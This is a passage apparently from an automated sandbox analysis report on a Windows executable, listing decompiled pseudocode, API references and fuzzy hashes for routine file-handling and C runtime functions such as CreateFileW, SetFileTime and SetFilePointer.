                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 5d7bb047d71767ce40c152e118097091d0f62aae71148933dd17f2f7a4b64989
                • Instruction ID: 439c5229691de7aa5b2378cb7d4ced15ca9320a9bb5457a8e73ecc3463eda4be
                • Opcode Fuzzy Hash: 5d7bb047d71767ce40c152e118097091d0f62aae71148933dd17f2f7a4b64989
                • Instruction Fuzzy Hash: 894144B0805B409EE720DF798485AE6FBE5FF19314F544A2EE9EE83282CB326554CB11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA137D, Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00CA137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00CBD870(E00CD1157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00CA943C(_t78);
				 *_t89 = 0xcd22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00CA5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00CAC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00CA151B();
				_t62 = E00CA151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00CBD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00CAAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00CBE920(_t87, _t89 + 0x2208, 0, 0x40);
				E00CBE920(_t87, _t89 + 0x2248, 0, 0x34);
				E00CBE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














                0x00ca137d
                0x00ca137d
                0x00ca137d
                0x00ca137d
                0x00ca1382
                0x00ca1387
                0x00ca138a
                0x00ca138c
                0x00ca138f
                0x00ca1396
                0x00ca13a2
                0x00ca13a5
                0x00ca13b0
                0x00ca13b4
                0x00ca13bf
                0x00ca13c5
                0x00ca13cb
                0x00ca13d6
                0x00ca13de
                0x00ca13e2
                0x00ca13e5
                0x00ca13eb
                0x00ca13f1
                0x00ca13f3
                0x00ca1418
                0x00ca13f5
                0x00ca13fa
                0x00ca1400
                0x00ca1403
                0x00ca1409
                0x00ca1414
                0x00ca140b
                0x00ca140d
                0x00ca140d
                0x00ca1409
                0x00ca141b
                0x00ca1427
                0x00ca142e
                0x00ca1435
                0x00ca143e
                0x00ca1449
                0x00ca1453
                0x00ca1459
                0x00ca145f
                0x00ca1465
                0x00ca146b
                0x00ca1471
                0x00ca1477
                0x00ca147e
                0x00ca1484
                0x00ca148a
                0x00ca1490
                0x00ca1496
                0x00ca149c
                0x00ca14ab
                0x00ca14ba
                0x00ca14c5
                0x00ca14cd
                0x00ca14d3
                0x00ca14d9
                0x00ca14df
                0x00ca14e5
                0x00ca14eb
                0x00ca14f1
                0x00ca14fa
                0x00ca1500
                0x00ca1506
                0x00ca150e
                0x00ca1518

                APIs
                • __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA5E99: __EH_prolog.LIBCMT ref: 00CA5E9E
                  • Part of subcall function 00CAC4CA: __EH_prolog.LIBCMT ref: 00CAC4CF
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC512
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC536
                • new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 973bb902df1a6cfa21fdbf77ac71f670f490cc056da027e6c02b70e6bf843142
                • Instruction ID: 4f7c84b8b53e2eebfc170cbb5ff0d19310028d3a93e5d8a2413610809aa44a8f
                • Opcode Fuzzy Hash: 973bb902df1a6cfa21fdbf77ac71f670f490cc056da027e6c02b70e6bf843142
                • Instruction Fuzzy Hash: 7D4134B0805B409EE724DF798485AE7FBE5FF29314F544A2ED5EE83282CB326554CB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCA6B2, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00CCA6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00CC8516(__ebx, __ecx, __edx);
				E00CCA7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E00CCA446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00CC7A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00CCA873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00CC7847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xcddb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xcddb20) {
								E00CC7A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xcddda0 & 0x00000001;
							if(( *0xcddda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00CCA31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xcddd40; // 0xf124e8
									 *0xcdd814 = _t44;
								}
							}
						}
						L6:
						E00CC7A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00CC7ECC())) = 0x16;
						goto L5;
					}
				}
			}


















                0x00cca6b2
                0x00cca6bf
                0x00cca6c2
                0x00cca6ca
                0x00cca6d3
                0x00cca6d6
                0x00cca6dc
                0x00000000
                0x00cca6de
                0x00cca6e2
                0x00cca6ef
                0x00cca6f1
                0x00cca6f5
                0x00cca6f7
                0x00cca727
                0x00cca727
                0x00000000
                0x00cca6f9
                0x00cca706
                0x00cca70c
                0x00cca70f
                0x00cca714
                0x00cca718
                0x00cca71a
                0x00cca739
                0x00cca73d
                0x00cca73f
                0x00cca73f
                0x00cca74a
                0x00cca74e
                0x00cca74f
                0x00cca751
                0x00cca754
                0x00cca75b
                0x00cca760
                0x00cca765
                0x00cca75b
                0x00cca766
                0x00cca76c
                0x00cca771
                0x00cca773
                0x00cca776
                0x00cca779
                0x00cca780
                0x00cca782
                0x00cca789
                0x00cca78e
                0x00cca797
                0x00cca79c
                0x00cca7a2
                0x00cca7a4
                0x00cca7a9
                0x00cca7a9
                0x00cca7a2
                0x00cca789
                0x00cca729
                0x00cca72a
                0x00000000
                0x00cca71c
                0x00cca721
                0x00000000
                0x00cca721
                0x00cca71a

                APIs
                  • Part of subcall function 00CC8516: GetLastError.KERNEL32(?,00CE00E0,00CC3394,00CE00E0,?,?,00CC2E0F,?,?,00CE00E0), ref: 00CC851A
                  • Part of subcall function 00CC8516: _free.LIBCMT ref: 00CC854D
                  • Part of subcall function 00CC8516: SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC858E
                  • Part of subcall function 00CC8516: _abort.LIBCMT ref: 00CC8594
                  • Part of subcall function 00CCA7D1: _abort.LIBCMT ref: 00CCA803
                  • Part of subcall function 00CCA7D1: _free.LIBCMT ref: 00CCA837
                  • Part of subcall function 00CCA446: GetOEMCP.KERNEL32(00000000,?,?,00CCA6CF,?), ref: 00CCA471
                • _free.LIBCMT ref: 00CCA72A
                • _free.LIBCMT ref: 00CCA760
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID:
                • API String ID: 2991157371-0
                • Opcode ID: 5397ea4144bda139f0f61d0d828cec971b1dba53804ab4990e1579719823be78
                • Instruction ID: 867d82ca68e6f367e436e6fca829ef6e6555a30d3d066f1318917c14b728db91
                • Opcode Fuzzy Hash: 5397ea4144bda139f0f61d0d828cec971b1dba53804ab4990e1579719823be78
                • Instruction Fuzzy Hash: 0331B131904208AFDB10EBA9D849FADB7F5EF40328F25419EE5149B2A1EB719E40EB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9528, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CA9528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00CBD940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00CAB927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00CAB32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00CAFAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                0x00ca952d
                0x00ca9533
                0x00ca9540
                0x00ca9542
                0x00ca9548
                0x00ca9556
                0x00ca9556
                0x00ca9550
                0x00ca9550
                0x00ca9550
                0x00ca9560
                0x00ca9575
                0x00ca957e
                0x00ca9584
                0x00ca958e
                0x00000000
                0x00ca9590
                0x00ca9590
                0x00ca9594
                0x00ca9596
                0x00ca9596
                0x00ca959c
                0x00ca959c
                0x00ca959c
                0x00ca95a0
                0x00ca95a0
                0x00ca95b0
                0x00ca95b6
                0x00ca95b6
                0x00ca95bd
                0x00ca95eb
                0x00ca95eb
                0x00ca95fd
                0x00ca9602
                0x00ca9605
                0x00ca961e

                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9BF3,?,?,00CA76AC), ref: 00CA95B0
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9BF3,?,?,00CA76AC), ref: 00CA95E5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: e64291cb3cdf032bed96a965aa76ef8ef731e82cfefcb748b172e54e93654605
                • Instruction ID: 9522c67ca0ea4abe62734ed117134d1b393c2747a659a897d25352587547ca39
                • Opcode Fuzzy Hash: e64291cb3cdf032bed96a965aa76ef8ef731e82cfefcb748b172e54e93654605
                • Instruction Fuzzy Hash: E821F6B1804749AFE7318F54C847BA777E8EB4A368F004A2DF5E5821D2C374AD499A61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9A7E, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00CA9A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00CB082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E00CB082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00CB082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}















                0x00ca9a7e
                0x00ca9a84
                0x00ca9a8d
                0x00ca9a98
                0x00ca9a98
                0x00ca9a9e
                0x00ca9aa4
                0x00ca9aa7
                0x00ca9ab4
                0x00ca9ab0
                0x00ca9ab0
                0x00ca9ab0
                0x00ca9ab6
                0x00ca9ab7
                0x00ca9abb
                0x00ca9ac1
                0x00ca9ace
                0x00ca9ace
                0x00ca9ac3
                0x00ca9ac8
                0x00ca9acc
                0x00000000
                0x00000000
                0x00ca9acc
                0x00ca9ad3
                0x00ca9ad9
                0x00ca9ae3
                0x00ca9ae3
                0x00ca9ae7
                0x00ca9aee
                0x00ca9aee
                0x00ca9af8
                0x00ca9b01
                0x00ca9b01
                0x00ca9b09
                0x00ca9b12
                0x00ca9b12
                0x00ca9b22
                0x00ca9b30
                0x00ca9b40
                0x00ca9b48
                0x00ca9b54

                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00CA738C,?,?,?), ref: 00CA9A98
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9B48
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 22bdfb8776be9a05740655c5f8ce263496b6bd97a5ad911515a934540f9324c5
                • Instruction ID: 69797643a435746ffcc4fbcc3f4858daf42ccea5fed1bb62a2cc896b6180bcaf
                • Opcode Fuzzy Hash: 22bdfb8776be9a05740655c5f8ce263496b6bd97a5ad911515a934540f9324c5
                • Instruction Fuzzy Hash: 1B21E731148346AFC711DF24D492AABBBE4EF52708F04091EB891C7141D735EE08E7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9990, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00CC9990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xd007b8 + _a4 * 4;
				_t27 =  *0xcdd668; // 0x814d2927
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xcdd668; // 0x814d2927
							goto L13;
						}
						 *_t20 = E00CBDB10(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00CC9A2C( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xcdd668; // 0x814d2927
						goto L7;
					}
					_t27 =  *0xcdd668; // 0x814d2927
					goto L8;
				}
				L2:
				return _t33;
			}










                0x00cc999b
                0x00cc99a4
                0x00cc99aa
                0x00cc99b4
                0x00cc99b6
                0x00cc99ba
                0x00cc9a25
                0x00000000
                0x00cc9a25
                0x00cc99be
                0x00cc99c4
                0x00cc99ca
                0x00cc99e6
                0x00cc99e6
                0x00cc99e8
                0x00cc99ea
                0x00cc9a15
                0x00cc9a17
                0x00cc9a1f
                0x00cc9a23
                0x00000000
                0x00cc9a23
                0x00cc99f6
                0x00cc99fa
                0x00cc9a0f
                0x00000000
                0x00cc9a0f
                0x00cc9a03
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc99cc
                0x00cc99cc
                0x00cc99ce
                0x00cc99d6
                0x00000000
                0x00000000
                0x00cc99d8
                0x00cc99de
                0x00000000
                0x00000000
                0x00cc99e0
                0x00000000
                0x00cc99e0
                0x00cc9a07
                0x00000000
                0x00cc9a07
                0x00cc99c0
                0x00000000

                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC99F0
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00CC99FD
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 41a5516cc2a12e6df11a87e0488fdee0080741bb0502cd556bdee62a266c19ab
                • Instruction ID: 38514650e37a71a5a2029de1f63e52fc7388f8b0914498a74eac09b3d0ebbb07
                • Opcode Fuzzy Hash: 41a5516cc2a12e6df11a87e0488fdee0080741bb0502cd556bdee62a266c19ab
                • Instruction Fuzzy Hash: EE110633E016219B9F21DE29DC44F9A73A5EB807207164669FC2DEB284DA30ED02D6D1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9B57, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00CA9B57() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00CA6DE2(0xce00e0, 0xce00e0, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00CA6DE2(0xce00e0, 0xce00e0, _t34 + 0x1e);
				goto L3;
			}













                0x00ca9b5b
                0x00ca9b5d
                0x00ca9b68
                0x00ca9b7b
                0x00ca9b7b
                0x00ca9b8d
                0x00ca9b93
                0x00ca9b97
                0x00ca9bb4
                0x00ca9bba
                0x00ca9bbf
                0x00ca9bc1
                0x00000000
                0x00ca9ba3
                0x00ca9ba7
                0x00ca9bd0
                0x00ca9bc4
                0x00000000
                0x00ca9bc4
                0x00ca9baf
                0x00000000
                0x00ca9baf
                0x00ca9b97
                0x00ca9b6e
                0x00000000
                0x00ca9bcc
                0x00ca9b76
                0x00000000

                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00CA9B8D
                • GetLastError.KERNEL32 ref: 00CA9B99
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: b3fa844246c1f1a2ccd446ad51eabdbf19349d29b9a92d508e0cb6283688a8bb
                • Instruction ID: 9e160d9d434c71e7fd139332724943b9892a8ec984321532270aac3cd94bcc7c
                • Opcode Fuzzy Hash: b3fa844246c1f1a2ccd446ad51eabdbf19349d29b9a92d508e0cb6283688a8bb
                • Instruction Fuzzy Hash: 6001B5717012016BDB349E29FC85B6BB7DAEB86319F14453EB152C36C0CA74DD08C671
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9903, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00CA9903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E00CA96E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}











                0x00ca9907
                0x00ca990d
                0x00ca9972
                0x00000000
                0x00ca9972
                0x00ca9910
                0x00ca9914
                0x00ca9917
                0x00ca9919
                0x00ca9943
                0x00ca9921
                0x00ca9921
                0x00ca9926
                0x00ca992d
                0x00ca9936
                0x00ca992f
                0x00ca9931
                0x00ca9931
                0x00ca993b
                0x00ca993d
                0x00ca993f
                0x00ca993f
